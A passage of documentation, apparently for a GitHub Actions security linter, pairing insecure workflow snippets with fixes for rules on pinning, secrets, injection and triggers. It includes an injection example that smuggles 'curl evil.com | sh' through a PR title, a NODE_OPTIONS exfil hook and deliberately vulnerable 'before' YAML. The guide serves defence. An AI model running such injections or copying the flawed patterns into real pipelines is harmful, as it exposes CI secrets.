+| [ISSUE-308](#issue-308--secrets-dynamic-index) | `secrets-dynamic-index` | low |
+
+### Triggers & composition β `4xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-414](#issue-414--dangerous-triggers) | `dangerous-triggers` | **critical** |
+| [ISSUE-415](#issue-415--pull-request-target-with-head-checkout) | `pull-request-target-with-head-checkout` | **critical** |
+
+### Access & authorisation β `5xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-509](#issue-509--excessive-permissions) | `excessive-permissions` | high |
+
+### Workflow hygiene β `6xx`
+
+| Code | Name | Severity |
+| :--- | :--- | :--- |
+| [ISSUE-601](#issue-601--anonymous-definition) | `anonymous-definition` | low |
+| [ISSUE-602](#issue-602--missing-concurrency) | `missing-concurrency` | medium |
+| [ISSUE-603](#issue-603--workflow-misfeature) | `workflow-misfeature` | medium |
+| [ISSUE-604](#issue-604--workflow-obfuscation) | `workflow-obfuscation` | high |
+| [ISSUE-605](#issue-605--use-trusted-publishing) | `use-trusted-publishing` | high |
+| [ISSUE-606](#issue-606--dependabot-insecure-exec) | `dependabot-insecure-exec` | **critical** |
+| [ISSUE-607](#issue-607--dependabot-missing-cooldown) | `dependabot-missing-cooldown` | low |
+| [ISSUE-608](#issue-608--dependency-update-tool-missing) | `dependency-update-tool-missing` | medium |
+| [ISSUE-609](#issue-609--sast-workflow-missing) | `sast-workflow-missing` | low |
+| [ISSUE-610](#issue-610--security-policy-missing) | `security-policy-missing` | low |
+
+### Run / output conventions
+
+- Every finding prints a clickable `β³ at :` β `Ctrl+click`
+ in a VS Code terminal opens the exact job.
+- Severity counts drive the **Plumber score** (AβE). Rules tagged
+ _(API)_ call GitHub through `gh` and stay silent when `gh auth login`
+ has not been set up.
+- To turn a rule off, either disable its `ControlName` in
+ `.plumber.yaml` or pass `--skip-controls `. The
+ mapping lives in [`control/codes.go`](../control/codes.go).
+
+---
+
+## ISSUE-102 β `image-mutable-tag`
+
+**Severity:** `high` β’ **Control:** `containerImageMustNotUseForbiddenTags`
+
+A job's `container.image` uses a tag that appears in the configured
+forbidden list (`latest`, `dev`, `main`, glob patterns). Mutable tags
+let the registry maintainer β or an attacker who compromises the
+registry β swap the image under the job's feet.
+
+```yaml
+# β before
+jobs:
+ build:
+ container: node:latest
+ runs-on: ubuntu-latest
+```
+
+```yaml
+# β
after β immutable tag
+jobs:
+ build:
+ container: node:20.11.0
+ runs-on: ubuntu-latest
+```
+
+**Config.** `containerImageMustNotUseForbiddenTags.tags` β list of tags
+to forbid.
+
+---
+
+## ISSUE-103 β `image-not-pinned-by-digest`
+
+**Severity:** `high` β’ **Control:** `containerImageMustNotUseForbiddenTags`
+
+When `containerImagesMustBePinnedByDigest: true`, every `container:`
+image must carry a `@sha256:β¦` digest. Even a version tag like
+`20.11.0` can be re-pushed by the registry owner; only the digest is
+cryptographically stable.
+
+```yaml
+# β before
+jobs:
+ build:
+ container: node:20.11.0
+```
+
+```yaml
+# β
after β digest pin
+jobs:
+ build:
+ container: node:20.11.0@sha256:8b9bc5f36ba5c7c4b3f1e6d0c7a2e9f8b3d1c0a9b2e3c4d5f6a7b8c9d0e1f2a3
+```
+
+Tip: `docker inspect --format='{{index .RepoDigests 0}}' node:20.11.0`
+prints the digest for the tag you just pulled.
+
+---
+
+## ISSUE-104 β `action-unpinned`
+
+**Severity:** `high` β’ **Control:** `actionsMustBePinnedByCommitSha`
+
+A workflow step references a third-party action with a mutable ref β
+a tag (`@v4`) or a branch (`@main`). Tags and branches are mutable: the
+maintainer can retag them, and anyone who compromises the maintainer
+account can too. The **tj-actions/changed-files** compromise of March
+2025 (CVE-2025-30066) propagated exactly this way across hundreds of
+repos.
+
+```yaml
+# β before
+- uses: peaceiris/actions-gh-pages@v3
+```
+
+```yaml
+# β
after β 40-char commit SHA + documenting comment
+- uses: peaceiris/actions-gh-pages@4f9cc6602b3c52e6dd3ff78e1a74bbf0d0a45c9a # v3.9.3
+```
+
+**Config.** Enabled by default in the generated `.plumber.yaml`.
+`trustedOwners: [actions, github]` exempts first-party GitHub-owned
+actions so the initial signal stays focused on the third-party
+surface. Pair with Dependabot
+(`version-update-strategy: sha-and-version`) to keep pins fresh, or
+set `enabled: false` on projects that are not yet ready to migrate.
+
+---
+
+## ISSUE-105 β `container-hardcoded-credentials`
+
+**Severity:** `critical` β’ **Control:** `containerCredentialsMustComeFromSecrets`
+
+`container.credentials.password` is a plain string committed to git
+history. Anyone with clone access β including the entire public on a
+public repo β can retrieve it; rotation means rewriting history.
+
+```yaml
+# β before
+jobs:
+ build:
+ container:
+ image: ghcr.io/org/private:latest
+ credentials:
+ username: myuser
+ password: hunter2
+```
+
+```yaml
+# β
after β secret reference
+jobs:
+ build:
+ container:
+ image: ghcr.io/org/private:latest
+ credentials:
+ username: ${{ secrets.DOCKER_USERNAME }}
+ password: ${{ secrets.DOCKER_PASSWORD }}
+```
+
+---
+
+## ISSUE-106 β `cache-poisoning`
+
+**Severity:** `high` β’ **Control:** `releaseWorkflowsMustNotRestoreUntrustedCache`
+
+A release or publish job restores a build cache whose key is not scoped
+to the release ref. GitHub caches are shared across branches: a PR on
+any feature branch can populate the same key that the release run later
+restores, silently injecting compiled artefacts into the published
+package. Real attacks have abused this path against PyPI and npm.
+
+```yaml
+# β before β cache key shared with every branch
+on: [release]
+jobs:
+ publish:
+ steps:
+ - uses: actions/cache@v4
+ with:
+ key: deps-${{ hashFiles('**/package-lock.json') }}
+ path: ~/.npm
+ - uses: JS-DevTools/npm-publish@v3
+```
+
+```yaml
+# β
after β key weaves github.ref_name so PR caches cannot win
+on: [release]
+jobs:
+ publish:
+ steps:
+ - uses: actions/cache@v4
+ with:
+ key: release-${{ github.ref_name }}-${{ hashFiles('**/package-lock.json') }}
+ path: ~/.npm
+ - uses: JS-DevTools/npm-publish@v3
+```
+
+---
+
+## ISSUE-107 β `dockerfile-unpinned-base`
+
+**Severity:** `medium` β’ **Control:** `dockerfilesMustPinBaseImageByDigest`
+
+A repository Dockerfile uses `FROM image:tag` without an immutable
+`@sha256:β¦` digest. Tags are mutable at the registry level: an
+attacker who compromises the registry β or the image maintainer β
+can re-push the same tag to point at a different layer, silently
+injecting code into every subsequent build. Digest pinning is the
+single control that neutralises this vector.
+
+```dockerfile
+# β before β tag can be re-pushed under your feet
+FROM alpine:3.20
+```
+
+```dockerfile
+# β
after β digest pin, immutable
+FROM alpine:3.20@sha256:b7d40c02c23be0ca99da3a0e5e8bd2f0a0a2b3a0e5e8bd2f0a0a2b3a0e5e8bd2
+```
+
+`docker inspect --format='{{index .RepoDigests 0}}' alpine:3.20`
+prints the digest for the tag you just pulled. Automate refresh
+with Dependabot (`package-ecosystem: docker`) or Renovate
+(`pinDigests: true`) so the pin stays current.
+
+---
+
+## ISSUE-108 β `action-archived-repo`
+
+**Severity:** `high` _(API)_ β’ **Control:** `actionsMustNotBeArchived`
+
+The upstream repository hosting the action is archived. No more
+security patches, no more compatibility updates β every existing CVE
+stays open forever. Pinning by SHA does not help: a stray push by the
+last maintainer is still possible.
+
+```yaml
+# β before β action hosted in an archived repo
+- uses: some-abandoned-org/stale-helper@v1
+```
+
+```yaml
+# β
after β audited, maintained fork (or inline the step)
+- uses: my-org/stale-helper@17d1c24β¦ # v1.2.1 β fork audited 2026-04
+```
+
+---
+
+## ISSUE-109 β `impostor-commit`
+
+**Severity:** `critical` _(API)_ β’ **Control:** `actionRefsMustExistUpstream`
+
+The SHA the workflow pins does not exist in the action's upstream
+repository. Two possible roots:
+
+1. A typo β the runner silently falls back to the default branch.
+2. The `impostor commit` attack class documented in academic supply
+ chain research: a SHA visible in a PR comment or stargazer URL,
+ never merged upstream.
+
+Either way, the review trusted a SHA the repository never approved.
+
+```yaml
+# β before β SHA does not resolve in actions/checkout
+- uses: actions/checkout@deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
+```
+
+```yaml
+# β
after β verify with `gh api repos///commits/`
+- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.1.7
+```
+
+---
+
+## ISSUE-110 β `ref-version-mismatch`
+
+**Severity:** `medium` _(API)_ β’ **Control:** `actionPinCommentsMustMatchSha`
+
+The `# vX.Y.Z` comment trailing a SHA-pinned `uses:` names a version
+that does not match the SHA. Reviewers scan diffs and trust the
+annotation β a silent downgrade slips through unnoticed.
+
+```yaml
+# β before β SHA resolves to v3.5.0 but the comment lies
+- uses: actions/checkout@8e5e7e5ab8b370d6c329ec480221332ada57f0ab # v4.1.0
+```
+
+```yaml
+# β
after β SHA and comment aligned
+- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.1.7
+```
+
+---
+
+## ISSUE-111 β `stale-action-ref`
+
+**Severity:** `low` _(API)_ β’ **Control:** `actionPinsMustNotBeStale`
+
+The pinned SHA is behind the latest upstream release. The pin still
+works, but it misses the security fixes, dependency bumps and runtime
+compatibility changes shipped since.
+
+```yaml
+# β before β pin is 14 months behind latest
+- uses: actions/checkout@72f2cec99f417b1a1c5e2e88945068983b7965f9 # v4.1.1
+```
+
+```yaml
+# β
after β latest release, handled by Dependabot
+- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.1.7
+```
+
+Configure Dependabot with `version-update-strategy: sha-and-version`
+to automate the upgrade loop.
+
+---
+
+## ISSUE-112 β `release-workflow-unsigned`
+
+**Severity:** `medium` β’ **Control:** `releaseWorkflowsMustSignArtefacts`
+
+A release or publish job produces artefacts without any signing
+step. Consumers pulling the release then have no cryptographic
+handle to verify the artefact was built by the expected pipeline
+rather than tampered with along the way (cache poisoning,
+compromised runner, repository takeover).
+
+```yaml
+# β before β release without signing
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: make dist
+ - uses: softprops/action-gh-release@v2
+ with:
+ files: dist/*
+```
+
+```yaml
+# β
after β cosign signs each artefact, .sig published alongside
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ permissions:
+ id-token: write
+ contents: write
+ steps:
+ - uses: actions/checkout@v4
+ - uses: sigstore/cosign-installer@v3
+ - run: make dist
+ - run: cosign sign-blob --yes dist/release.tar.gz > dist/release.tar.gz.sig
+ - uses: softprops/action-gh-release@v2
+ with:
+ files: |
+ dist/release.tar.gz
+ dist/release.tar.gz.sig
+```
+
+OIDC-based publish actions with built-in provenance
+(`pypa/gh-action-pypi-publish` with trusted publishing,
+`npm publish --provenance`) are considered self-signing and stay
+silent.
+
+---
+
+## ISSUE-113 β `ref-confusion`
+
+**Severity:** `medium` _(API)_ β’ **Control:** `actionRefsMustNotCollide`
+
+The action's ref resolves upstream as **both a tag and a branch**
+(classic case: a tag `v1` kept alongside a long-lived `v1` branch).
+GitHub Actions resolves tags first, so the reference works today,
+but a later rename / tag deletion / workflow typo silently switches
+the binding. The reviewer cannot tell from the YAML alone which
+revision will run.
+
+```yaml
+# β before β `v1` exists as both a tag AND a branch on the action repo
+- uses: some-org/widget@v1
+```
+
+```yaml
+# β
after β 40-char SHA, unambiguous
+- uses: some-org/widget@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0 # v1.0.3
+```
+
+Alternative: ask the action maintainer to drop either the tag or
+the branch. Keeping both is a supply-chain landmine for every
+caller.
+
+---
+
+## ISSUE-114 β `known-vulnerable-action`
+
+**Severity:** `critical` _(API)_ β’ **Control:** `actionsMustNotCarryKnownCVEs`
+
+At least one published entry in the GitHub Advisory Database
+(`ecosystem=actions`) mentions this action. Running a workflow on a
+known-vulnerable release inherits the published vulnerability class
+(RCE, secret exfiltration, privilege escalation). Real-world
+examples: tj-actions/changed-files (CVE-2025-30066), unpatched
+releases of `actions/artifact`.
+
+The finding message carries the full advisory URL for every GHSA
+identifier it matched, so the terminal renderer turns each entry
+into a clickable link:
+
+```text
+CRIT [ISSUE-114] job "build" references "tj-actions/changed-files@v45" β
+ published advisories: GHSA-mrrh-fwg8-r2c3 (https://github.com/advisories/GHSA-mrrh-fwg8-r2c3)
+ β³ at .github/workflows/ci.yml:28
+ β³ docs: https://getplumber.io/docs/use-plumber/issues/ISSUE-114
+```
+
+```yaml
+# β before β version carrying GHSA-xxxx-xxxx-xxxx
+- uses: tj-actions/changed-files@v45.0.0
+```
+
+```yaml
+# β
after β upgrade past the fixed-in version, SHA-pinned
+- uses: tj-actions/changed-files@ # v46.0.1 or later
+```
+
+Tip: `gh api "/advisories?ecosystem=actions&affects=tj-actions/changed-files"`
+lists every advisory known for an action, with the `vulnerable_version_range`
+and `patched_versions` fields.
+
+---
+
+## ISSUE-115 β `superfluous-action`
+
+**Severity:** `low` β’ **Control:** `actionsMustNotDuplicateRunnerBuiltins`
+
+The workflow reaches for a third-party wrapper that duplicates
+functionality already on the runner: `peter-evans/create-pull-request`
+around `gh pr create`, `nick-invision/retry` around a three-line
+bash retry loop, `mikefarah/yq-action` around the `yq` binary
+already on `ubuntu-latest`. Each link is an extra supply-chain
+dependency for zero capability gain.
+
+```yaml
+# β before
+- uses: peter-evans/create-pull-request@v6
+ with:
+ title: automated
+ commit-message: bump
+```
+
+```yaml
+# β
after β `gh` does the job, one less dependency
+- env:
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ run: |
+ git checkout -b automated
+ git commit -am "bump"
+ git push -u origin automated
+ gh pr create --title automated --body ""
+```
+
+The curated list (conservative by design) tracks the most common
+offenders; complex actions like `actions/cache` or `setup-`
+stay off it because they do enough real work to justify the
+dependency.
+
+---
+
+## ISSUE-206 β `template-injection`
+
+**Severity:** `critical` β’ **Control:** `workflowMustNotInjectUserInputInScripts`
+
+A `run:` shell script interpolates `${{ github.event.* }}`,
+`${{ github.head_ref }}` or `${{ github.pull_request.* }}` directly.
+Under a privileged trigger (`pull_request_target`, `workflow_run`)
+those expressions carry PR-author-controlled values; a title crafted
+as `"; curl evil.com | sh #` becomes a shell command with the base
+repo's secrets.
+
+```yaml
+# β before β PR title is pasted straight into the shell
+- run: echo "Title is ${{ github.event.pull_request.title }}"
+```
+
+```yaml
+# β
after β env: binding, shell expansion quotes the value
+- env:
+ TITLE: ${{ github.event.pull_request.title }}
+ run: echo "Title is $TITLE"
+```
+
+---
+
+## ISSUE-208 β `insecure-commands`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotReEnableInsecureCommands`
+
+`ACTIONS_ALLOW_UNSECURE_COMMANDS: true` re-enables the deprecated
+`::set-env::` / `::add-path::` workflow commands disabled after
+CVE-2020-15228. Any log line the attacker can influence rewrites the
+running job's environment and PATH.
+
+```yaml
+# β before
+jobs:
+ build:
+ env:
+ ACTIONS_ALLOW_UNSECURE_COMMANDS: "true"
+ steps:
+ - run: echo "::set-env name=PATH::/opt/attack:$PATH"
+```
+
+```yaml
+# β
after β validated writes through $GITHUB_ENV / $GITHUB_PATH
+jobs:
+ build:
+ steps:
+ - run: echo "BUILD_MODE=release" >> "$GITHUB_ENV"
+```
+
+---
+
+## ISSUE-209 β `github-env-injection`
+
+**Severity:** `critical` β’ **Control:** `workflowMustNotWriteUntrustedContentToGitHubEnv`
+
+A `run:` step appends a value containing a `${{ github.event.* }}` /
+`head_ref` / `pull_request.*` expression to `$GITHUB_ENV` or
+`$GITHUB_PATH`. Those files are sticky: every following step inherits
+the variables / PATH entries. Injecting `NODE_OPTIONS=--require=./exfil.js`
+hijacks every later Node invocation.
+
+```yaml
+# β before
+- run: echo "PR_TITLE=${{ github.event.pull_request.title }}" >> "$GITHUB_ENV"
+```
+
+```yaml
+# β
after β env: binding keeps the template off the redirect line
+- env:
+ TITLE: ${{ github.event.pull_request.title }}
+ run: echo "PR_TITLE=$TITLE" >> "$GITHUB_ENV"
+```
+
+---
+
+## ISSUE-210 β `bot-conditions`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotTrustSpoofableActorChecks`
+
+An `if:` guard tests `github.actor`, `github.triggering_actor`,
+`github.event.sender.login`, etc. Those fields reflect whoever opened
+the PR β spoofable by a fork with a crafted login. The gate the
+author believes is in place does not stop a determined attacker.
+
+```yaml
+# β before β spoofable bot check
+jobs:
+ auto-merge:
+ if: github.actor == 'dependabot[bot]'
+ runs-on: ubuntu-latest
+ steps:
+ - run: gh pr merge --auto --squash "$PR_URL"
+```
+
+```yaml
+# β
after β environment-gated approval path
+jobs:
+ auto-merge:
+ environment: dependabot-auto-merge # required reviewers on the env
+ runs-on: ubuntu-latest
+ steps:
+ - run: gh pr merge --auto --squash "$PR_URL"
+```
+
+---
+
+## ISSUE-211 β `unsound-condition`
+
+**Severity:** `medium` β’ **Control:** `workflowConditionsMustBeSound`
+
+A tautology (`always() || β¦`, `true == true`) or a contradiction
+(`false && β¦`) in an `if:`. The gate the author thought they installed
+is silently absent β the job runs unconditionally (tautology) or never
+(contradiction).
+
+```yaml
+# β before β always() short-circuits the OR
+jobs:
+ deploy:
+ if: always() || github.ref == 'refs/heads/main'
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
+```
+
+```yaml
+# β
after β the actual gate
+jobs:
+ deploy:
+ if: github.ref == 'refs/heads/main'
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
+```
+
+---
+
+## ISSUE-212 β `unsound-contains`
+
+**Severity:** `medium` β’ **Control:** `workflowContainsCallsMustBeSound`
+
+`contains(literal, expression)` inverts the built-in's signature.
+`contains('main', github.ref)` never matches because `'main'` does not
+contain `refs/heads/main` β the gate stays closed while the reviewer
+reads the reverse.
+
+```yaml
+# β before
+if: contains('main', github.ref)
+```
+
+```yaml
+# β
after β haystack first, needle second
+if: contains(github.ref, 'refs/heads/main')
+
+# β
β
explicit allow-list β clearest
+if: contains(fromJSON('["main", "release"]'), github.ref_name)
+```
+
+---
+
+## ISSUE-213 β `unsafe-github-context-dump`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotExportEntireGitHubContext`
+
+A `run:` script, env binding or action input serialises the whole
+`github` context (or `github.event`) via `toJson(...)`. The
+resulting JSON carries every user-controllable field GitHub exposes
+β PR title, issue body, fork branch name, commit message β
+bundled together. A single `echo $JSON` downstream leaks the full
+attack surface, and passing the blob to a third-party action hands
+it the same surface as input.
+
+```yaml
+# β before β every github.event field ends up in PAYLOAD
+jobs:
+ report:
+ env:
+ PAYLOAD: ${{ toJson(github.event) }}
+ steps:
+ - run: echo "$PAYLOAD" > /tmp/event.json
+```
+
+```yaml
+# β
after β name the specific fields you need
+jobs:
+ report:
+ env:
+ PR_NUMBER: ${{ github.event.pull_request.number }}
+ PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+ steps:
+ - run: jq -n --arg n "$PR_NUMBER" --arg a "$PR_AUTHOR" '{number:$n,author:$a}' > /tmp/event.json
+```
+
+Same risk class as ISSUE-206 template-injection, but the dump form
+is worse: one line leaks the whole field set rather than one
+field.
+
+---
+
+## ISSUE-214 β `unpinned-package-install`
+
+**Severity:** `medium` β’ **Control:** `workflowMustPinPackageInstalls`
+
+A `run:` step invokes `pip install PKG` or `npm install PKG`
+without pinning a version and without a lockfile install. Every
+run then resolves whatever is latest on the registry at execution
+time β a window exploited repeatedly by typosquat and maintainer-
+account compromise attacks.
+
+```yaml
+# β before
+- run: pip install requests
+- run: npm install react
+```
+
+```yaml
+# β
after β lockfile install + inline pin where needed
+- run: pip install -r requirements.txt
+- run: npm ci
+- run: pip install 'pytest==8.3.3'
+- run: npm install react@18.3.1
+```
+
+Lockfile-based installs (`npm ci`, `pip install -r requirements.txt --require-hashes`)
+combine with Dependabot to keep runs reproducible AND fresh.
+
+---
+
+## ISSUE-215 β `template-injection-vars`
+
+**Severity:** `low` β’ **Control:** `workflowMustNotInjectVarsInScripts`
+
+Same shape as ISSUE-206 template-injection but sourced from
+maintainer-adjacent values rather than PR-author input. Two kinds
+are flagged:
+
+- `${{ vars.* }}` β repo / org / environment variables set by
+ maintainers. Exploitable on a compromised maintainer account or a
+ misconfigured org-level variable.
+- `${{ inputs.* }}` β inputs to a reusable workflow. When the
+ caller proxies `github.event.*` into an input, the surface flips
+ to PR-author-controlled.
+
+```yaml
+# β before
+- run: docker login ${{ vars.REGISTRY }} -u admin -p ${{ secrets.TOKEN }}
+```
+
+```yaml
+# β
after β env binding quotes the value automatically
+- env:
+ REGISTRY: ${{ vars.REGISTRY }}
+ TOKEN: ${{ secrets.TOKEN }}
+ run: docker login "$REGISTRY" -u admin -p "$TOKEN"
+```
+
+```yaml
+# β before β reusable workflow input pasted into a shell
+- run: make ${{ inputs.test-command }}
+
+# β
after β binding via env:
+- env:
+ TEST_CMD: ${{ inputs.test-command }}
+ run: make "$TEST_CMD"
+```
+
+---
+
+## ISSUE-301 β `overprovisioned-secrets`
+
+**Severity:** `critical` β’ **Control:** `workflowMustNotExportEntireSecretsContext`
+
+`toJson(secrets)` or `toJSON(secrets)` serialises the entire secrets
+context into a string and passes it to a step's script, env binding,
+or action `with:` input. Every downstream consumer (log, third-party
+action, HTTP header) sees the full stock.
+
+```yaml
+# β before β every secret ends up in SECRETS_JSON
+jobs:
+ call:
+ env:
+ SECRETS_JSON: ${{ toJson(secrets) }}
+ steps:
+ - run: echo "$SECRETS_JSON" | ./upload
+```
+
+```yaml
+# β
after β one env binding per secret
+jobs:
+ call:
+ steps:
+ - env:
+ API_TOKEN: ${{ secrets.API_TOKEN }}
+ run: ./upload
+```
+
+---
+
+## ISSUE-302 β `secrets-inherit`
+
+**Severity:** `high` β’ **Control:** `reusableWorkflowsMustNotInheritSecrets`
+
+A reusable-workflow call with `secrets: inherit` forwards every secret
+visible to the caller. A compromise of the callee β upstream account,
+malicious PR merged on the reusable side, tag retag β then sees the
+full secret surface of every caller.
+
+```yaml
+# β before
+jobs:
+ call:
+ uses: org/shared/.github/workflows/publish.yml@v1
+ secrets: inherit
+```
+
+```yaml
+# β
after β explicit per-secret mapping
+jobs:
+ call:
+ uses: org/shared/.github/workflows/publish.yml@v1
+ secrets:
+ NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+```
+
+---
+
+## ISSUE-303 β `unredacted-secrets`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotUnredactSecretsViaFromJSON`
+
+`fromJSON(secrets.X).y` defeats GitHub's automatic log redaction.
+Redaction works on the known-secret value; once `fromJSON` parses the
+blob, the sub-fields are fresh strings the runtime never saw, so any
+later echo leaks them in plain text.
+
+```yaml
+# β before β .token bypasses redaction once fromJSON runs
+jobs:
+ deploy:
+ env:
+ API_TOKEN: ${{ fromJSON(secrets.CREDS).token }}
+ steps:
+ - run: echo "token=$API_TOKEN" >> deploy.log
+```
+
+```yaml
+# β
after β split the structured secret, store each leaf separately
+jobs:
+ deploy:
+ env:
+ API_TOKEN: ${{ secrets.API_TOKEN }}
+ steps:
+ - run: echo "token=$API_TOKEN" >> deploy.log
+```
+
+---
+
+## ISSUE-304 β `undocumented-permissions`
+
+**Severity:** `medium` β’ **Control:** `workflowsMustDeclarePermissions`
+
+Neither the workflow nor any job declares a `permissions:` block. The
+runner inherits the repository-wide default GITHUB_TOKEN scope β
+often `contents: write` or `read-all`. Every step gets more authority
+than it needs; any compromise escalates with that larger scope.
+
+```yaml
+# β before β inherits the repo default
+name: Build
+on: [push]
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make build
+```
+
+```yaml
+# β
after β least-privilege declaration
+name: Build
+on: [push]
+permissions:
+ contents: read
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make build
+```
+
+---
+
+## ISSUE-305 β `secrets-outside-env`
+
+**Severity:** `medium` β’ **Control:** `deployJobsMustUseEnvironmentGate`
+
+A deploy / publish job (trigger `release` or a canonical publish
+action) reads secrets without an `environment:` gate. Environments are
+the GitHub hook for required reviewers, wait timers, and deployment
+branch rules β without one, the trigger leads straight to the secret.
+
+```yaml
+# β before β no environment, no reviewer in the loop
+name: Publish
+on: [release]
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - run: twine upload --password ${{ secrets.PYPI_TOKEN }} dist/*
+```
+
+```yaml
+# β
after β environment: production with reviewers configured on it
+name: Publish
+on: [release]
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ environment: production
+ steps:
+ - run: twine upload --password ${{ secrets.PYPI_TOKEN }} dist/*
+```
+
+---
+
+## ISSUE-306 β `github-app-skip-revoke`
+
+**Severity:** `high` β’ **Control:** `githubAppTokensMustBeRevokedOnExit`
+
+A step mints a GitHub App installation token with
+`skip-token-revoke: true`. The token survives the run and becomes a
+long-lived credential β any later leak (log, artefact, restored cache)
+stays exploitable instead of meeting a revoked token.
+
+```yaml
+# β before
+- uses: actions/create-github-app-token@v1
+ id: app-token
+ with:
+ app-id: ${{ vars.APP_ID }}
+ private-key: ${{ secrets.APP_PRIVATE_KEY }}
+ skip-token-revoke: true
+```
+
+```yaml
+# β
after β default behaviour revokes on exit
+- uses: actions/create-github-app-token@v1
+ id: app-token
+ with:
+ app-id: ${{ vars.APP_ID }}
+ private-key: ${{ secrets.APP_PRIVATE_KEY }}
+```
+
+---
+
+## ISSUE-307 β `artipacked`
+
+**Severity:** `high` β’ **Control:** `checkoutMustNotPersistCredentials`
+
+`actions/checkout` writes the GITHUB_TOKEN into the cloned repo's
+`.git/config` by default. Any later step that uploads `.git` as part
+of an artefact, or that runs fork-controlled code, can exfiltrate the
+token.
+
+```yaml
+# β before β token persisted
+- uses: actions/checkout@v4
+```
+
+```yaml
+# β
after β disable credential persistence
+- uses: actions/checkout@v4
+ with:
+ persist-credentials: false
+```
+
+---
+
+## ISSUE-308 β `secrets-dynamic-index`
+
+**Severity:** `low` β’ **Control:** `workflowMustNotIndexSecretsDynamically`
+
+A workflow reads `${{ secrets[expr] }}` where `expr` is not a
+quoted literal β typically an `env.VAR_NAME`, `inputs.*`,
+`matrix.*`, or a computed expression. The bracket form defers the
+secret name resolution to runtime, which effectively hands read
+access to every secret the job can see to whatever drives `expr`.
+A later refactor that threads a template expression through the
+index silently promotes the weakness.
+
+```yaml
+# β before β which secret is read depends on an env binding
+jobs:
+ e2e:
+ env:
+ OSC_ACCESS_KEY_NAME: PROD_AK
+ steps:
+ - env:
+ OSC_ACCESS_KEY: ${{ secrets[env.OSC_ACCESS_KEY_NAME] }}
+ run: ./run-e2e.sh
+```
+
+```yaml
+# β
after β secret named directly, grant surface explicit
+jobs:
+ e2e:
+ steps:
+ - env:
+ OSC_ACCESS_KEY: ${{ secrets.PROD_AK }}
+ run: ./run-e2e.sh
+```
+
+When a matrix genuinely needs to choose among N secrets, split the
+job into N jobs with static names β the verbosity is worth the
+reviewability.
+
+---
+
+## ISSUE-414 β `dangerous-triggers`
+
+**Severity:** `critical` β’ **Control:** `workflowMustNotUseDangerousTriggers`
+
+The workflow subscribes to `pull_request_target` or `workflow_run`.
+Both run with the base repository's secrets AND are influenceable by
+an unprivileged caller. Combined with any form of user-content checkout
+or template injection, this becomes a direct secret-exfiltration path β
+the pattern behind the March 2025 tj-actions compromise (CVE-2025-30066).
+
+```yaml
+# β before
+name: PR preview
+on:
+ pull_request_target:
+ types: [opened, synchronize]
+```
+
+```yaml
+# β
after β standard pull_request runs in the fork's context
+name: PR preview
+on:
+ pull_request:
+ types: [opened, synchronize]
+```
+
+---
+
+## ISSUE-415 β `pull-request-target-with-head-checkout`
+
+**Severity:** `critical` β’ **Control:** `pullRequestTargetMustNotCheckoutHead`
+
+`pull_request_target` AND an explicit checkout of the PR head
+(`github.event.pull_request.head.sha`, `github.head_ref`). Base-repo
+secrets plus fork-controlled code in the same run: the exact vector
+of CVE-2025-30066.
+
+```yaml
+# β before β the literal tj-actions pattern
+name: Preview
+on: [pull_request_target]
+jobs:
+ preview:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: npm install && npm test
+```
+
+```yaml
+# β
after β split trigger: metadata under pull_request_target,
+# fork code under a plain pull_request handoff
+name: Preview β metadata
+on: [pull_request_target]
+permissions:
+ pull-requests: write
+jobs:
+ label:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4 # base repo, no ref: override
+ - run: gh pr edit --add-label auto-preview
+```
+
+---
+
+## ISSUE-509 β `excessive-permissions`
+
+**Severity:** `high` β’ **Control:** `workflowMustNotGrantPermissionsWriteAll`
+
+`permissions: write-all` grants the GITHUB_TOKEN write access to every
+API scope. Any compromise (unpinned action, injection, cache poisoning)
+then escalates to full repository control.
+
+```yaml
+# β before β blanket write-all
+permissions: write-all
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps: [ { run: make build } ]
+```
+
+```yaml
+# β
after β narrowest scope, widened per job when needed
+permissions:
+ contents: read
+jobs:
+ comment-pr:
+ runs-on: ubuntu-latest
+ permissions:
+ pull-requests: write # only the job that needs it
+ steps: [ { run: gh pr comment ... } ]
+```
+
+---
+
+## ISSUE-601 β `anonymous-definition`
+
+**Severity:** `low` β’ **Control:** `workflowsMustHaveExplicitName`
+
+No top-level `name:`. GitHub falls back to the file path in the Actions
+UI, PR checks, required-status-check rules and the audit log. A rename
+silently breaks the required-status-check binding that referenced the
+old path.
+
+```yaml
+# β before
+on: [push]
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps: [ { run: make build } ]
+```
+
+```yaml
+# β
after β stable identifier
+name: Build and Test
+on: [push]
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps: [ { run: make build } ]
+```
+
+---
+
+## ISSUE-602 β `missing-concurrency`
+
+**Severity:** `medium` β’ **Control:** `workflowsMustDeclareConcurrency`
+
+No `concurrency:` block at either workflow or job level. Concurrent
+triggers on the same ref (rebases, force-pushes, retries) race on
